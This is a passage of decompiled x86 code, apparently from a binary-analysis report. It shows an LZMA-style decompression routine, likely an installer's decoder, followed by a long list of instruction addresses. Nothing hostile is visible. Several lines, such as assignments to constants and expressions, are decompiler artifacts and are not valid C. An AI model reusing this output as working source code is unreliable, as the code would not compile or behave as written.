									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                0x00406a5f
                                                0x00406a66
                                                0x00406a6c
                                                0x00406a72
                                                0x00000000
                                                0x00406a76
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a98
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aad
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406af8
                                                0x00406afb
                                                0x00406b23
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406afd
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b15
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6c
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b71
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b8e
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd4
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727c
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b2
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00000000
                                                0x0040746e
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072da
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x00000000
                                                0x00406c8b
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c6e
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x00000000
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fd6
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
